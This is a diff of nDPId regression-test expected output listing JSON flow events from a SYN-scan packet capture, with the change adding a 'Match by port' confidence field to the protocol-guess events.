 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6150,21 +6150,21 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00589{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00590{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","ndpi": {"proto":"SMBv23","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","ndpi": {"proto":"SMBv23","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6204,11 +6204,11 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00596{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","ndpi": {"proto":"SMTPS","breed":"Safe","category":"Email"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00596{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","ndpi": {"proto":"SMTPS","breed":"Safe","category":"Email"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6230,9 +6230,9 @@
